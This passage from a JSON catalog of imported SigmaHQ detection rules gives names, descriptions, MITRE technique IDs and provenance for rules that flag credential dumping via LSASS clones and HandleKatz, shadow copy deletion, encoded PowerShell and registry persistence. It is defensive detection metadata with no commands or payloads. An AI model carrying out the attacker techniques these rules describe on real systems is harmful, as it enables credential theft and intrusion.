(part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-sysinternals-tools-execution-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml" } }, { "id": "sigmahq-sigma-c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "type": "detection", "name": "Disable Administrative Share Creation at Startup", "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-administrative-share-creation-at-startup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" } }, { "id": "sigmahq-sigma-c7e91a02-d771-4a6d-a700-42587e0b1095", "type": "detection", "name": "Network Connection Initiated By Regsvr32.EXE", "description": "Detects a network connection initiated by \"Regsvr32.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559.001", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-regsvr32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7e91a02-d771-4a6d-a700-42587e0b1095", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" } }, { "id": "sigmahq-sigma-c803b2ce-c4a2-4836-beae-b112010390b1", "type": "detection", "name": "New Network Route Added", "description": "Detects the addition of a new network route to a route table in AWS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-network-route-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c803b2ce-c4a2-4836-beae-b112010390b1", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml" } }, { "id": "sigmahq-sigma-c80e66d8-1780-48a9-b412-46663fd21ac0", "type": "detection", "name": "Suspicious Autorun Registry Modified via WMI", "description": "Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-autorun-registry-modified-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c80e66d8-1780-48a9-b412-46663fd21ac0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_autorun_registry_modified_via_wmic.yml" } }, { "id": "sigmahq-sigma-c830f15d-6f6e-430f-8074-6f73d6807841", "type": "detection", "name": "Logging Configuration Changes on Linux Host", "description": "Detect changes of syslog daemons configuration files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/logging-configuration-changes-on-linux-host.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c830f15d-6f6e-430f-8074-6f73d6807841", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_logging_config_change.yml" } }, { "id": "sigmahq-sigma-c83bf4b5-cdf0-437c-90fa-43d734f7c476", "type": "detection", "name": "Run PowerShell Script from Redirected Input Stream", "description": "Detects PowerShell script execution via input stream redirect", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-powershell-script-from-redirected-input-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml" } }, { "id": "sigmahq-sigma-c8557060-9221-4448-8794-96320e6f3e74", "type": "detection", "name": "Windows PowerShell User Agent", "description": "Detects Windows PowerShell Web Access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/windows-powershell-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8557060-9221-4448-8794-96320e6f3e74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_powershell.yml" } }, { "id": "sigmahq-sigma-c86133ad-4725-4bd0-8170-210788e0a7ba", "type": "detection", "name": "Net WebClient Casing Anomalies", "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/net-webclient-casing-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml" } }, { "id": "sigmahq-sigma-c86500e9-a645-4680-98d7-f882c70c1ea3", "type": "detection", "name": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", "description": "Detects AADInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aadinternals-powershell-cmdlets-execution-proccesscreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" } }, { "id": "sigmahq-sigma-c8a180d6-47a3-4345-a609-53f9c3d834fc", "type": "detection", "name": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-reconnaissance-activity-using-get-localgroupmember-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml" } }, { "id": "sigmahq-sigma-c8b00925-926c-47e3-beea-298fd563728e", "type": "detection", "name": "Remote Access Tool Services Have Been Installed - Security", "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-services-have-been-installed-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8b00925-926c-47e3-beea-298fd563728e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_service_install_remote_access_software.yml" } }, { "id": "sigmahq-sigma-c8da0dfd-4ed0-4b68-962d-13c9c884384e", "type": "detection", "name": "Potential Credential Dumping Via LSASS Process Clone", "description": "Detects a suspicious LSASS process clone that could be a sign of credential dumping activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-via-lsass-process-clone.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml" } }, { "id": "sigmahq-sigma-c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "type": "detection", "name": "Suspicious Named Error", "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-named-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/syslog/lnx_syslog_susp_named.yml" } }, { "id": "sigmahq-sigma-c90362e0-2df3-4e61-94fe-b37615814cb1", "type": "detection", "name": "Potential Persistence Via Netsh Helper DLL - Registry", "description": "Detects changes to the Netsh registry key to add a new DLL value. 
This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-netsh-helper-dll-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c90362e0-2df3-4e61-94fe-b37615814cb1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml" } }, { "id": "sigmahq-sigma-c9192ad9-75e5-43eb-8647-82a0a5b493e3", "type": "detection", "name": "PUA - Mouse Lock Execution", "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-mouse-lock-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml" } }, { "id": "sigmahq-sigma-c92c24e7-f595-493f-9c98-53d5142f5c18", "type": "detection", "name": "CodeIntegrity - Unsigned Image Loaded", "description": "Detects loaded unsigned image on the system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unsigned-image-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c92c24e7-f595-493f-9c98-53d5142f5c18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml" } }, { "id": "sigmahq-sigma-c947b146-0abc-4c87-9c64-b17e9d7274a2", "type": "detection", "name": "Shadow Copies Deletion Using Operating Systems Utilities", "description": "Shadow Copies deletion using operating systems utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070", "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/shadow-copies-deletion-using-operating-systems-utilities.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml" } }, { "id": "sigmahq-sigma-c977cb50-3dff-4a9f-b873-9290f56132f1", "type": "detection", "name": "AppX Located in Uncommon Directory Added to Deployment Pipeline", "description": "Detects an appx package located in an uncommon location that was added to the pipeline of \"to be processed\" packages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-located-in-uncommon-directory-added-to-deployment-pipeline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c977cb50-3dff-4a9f-b873-9290f56132f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml" } }, { "id": "sigmahq-sigma-c9783e20-4793-4164-ba96-d9ee483992c4", "type": "detection", "name": "Logged-On User Password Change Via Ksetup.EXE", "description": "Detects a password change for the logged-on user via \"ksetup.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/logged-on-user-password-change-via-ksetup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "c9783e20-4793-4164-ba96-d9ee483992c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml" } }, { "id": "sigmahq-sigma-c98f2a0d-e1b8-4f76-90d3-359caf88d6b9", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c98f2a0d-e1b8-4f76-90d3-359caf88d6b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_2.yml" } }, { "id": "sigmahq-sigma-c9a88268-0047-4824-ba6e-4d81ce0b907c", "type": "detection", "name": "Antivirus Relevant File Paths Alerts", "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-relevant-file-paths-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9a88268-0047-4824-ba6e-4d81ce0b907c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_relevant_files.yml" } }, { "id": "sigmahq-sigma-c9d8b7fd-78e4-44fe-88f6-599135d46d60", "type": "detection", "name": "Security Software Discovery - Linux", "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-software-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" } }, { "id": "sigmahq-sigma-c9eb55c3-b468-40ab-9089-db2862e42137", "type": "detection", "name": "Device Installation Blocked", "description": "Detects an installation of a device that is forbidden by the system policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/device-installation-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9eb55c3-b468-40ab-9089-db2862e42137", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_device_installation_blocked.yml" } }, { "id": "sigmahq-sigma-c9fbe8e9-119d-40a6-9b59-dd58a5d84429", "type": "detection", "name": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1542.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ransomware-or-unauthorized-mbr-tampering-via-bcdedit-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml" } }, { "id": "sigmahq-sigma-ca2092a1-c273-4878-9b4b-0d60115bf5ea", "type": "detection", "name": "Suspicious Encoded PowerShell Command Line", "description": "Detects suspicious powershell process starts with base64 
encoded commands (e.g. Emotet)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-encoded-powershell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml" } }, { "id": "sigmahq-sigma-ca387a8e-1c84-4da3-9993-028b45342d30", "type": "detection", "name": "PUA - SoftPerfect Netscan Execution", "description": "Detects usage of SoftPerfect's \"netscan.exe\". 
An application for scanning networks.\nIt is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-softperfect-netscan-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca387a8e-1c84-4da3-9993-028b45342d30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_netscan.yml" } }, { "id": "sigmahq-sigma-ca5583e9-8f80-46ac-ab91-7f314d13b984", "type": "detection", "name": "Potentially Suspicious Child Process of KeyScrambler.exe", "description": "Detects potentially suspicious child processes of KeyScrambler.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-keyscrambler-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca5583e9-8f80-46ac-ab91-7f314d13b984", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_keyscrambler_susp_child_process.yml" } }, { "id": "sigmahq-sigma-ca621ba5-54ab-4035-9942-d378e6fcde3c", "type": "detection", "name": "HackTool - HandleKatz LSASS Dumper Execution", "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-handlekatz-lsass-dumper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml" } }, { "id": "sigmahq-sigma-ca8b77a9-d499-4095-b793-5d5f330d450e", "type": "detection", "name": "PowerShell Credential Prompt", "description": "Detects PowerShell calling a credential prompt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-credential-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca8b77a9-d499-4095-b793-5d5f330d450e", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" } }, { "id": "sigmahq-sigma-ca94a6db-8106-4737-9ed2-3e3bb826af0a", "type": "detection", "name": "Password Policy Discovery - Linux", "description": "Detects password policy discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/password-policy-discovery-linux.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" } }, { "id": "sigmahq-sigma-ca9bf243-465e-494a-9e54-bf9fc239057d", "type": "detection", "name": "Azure Subscription Permission Elevation Via AuditLogs", "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ 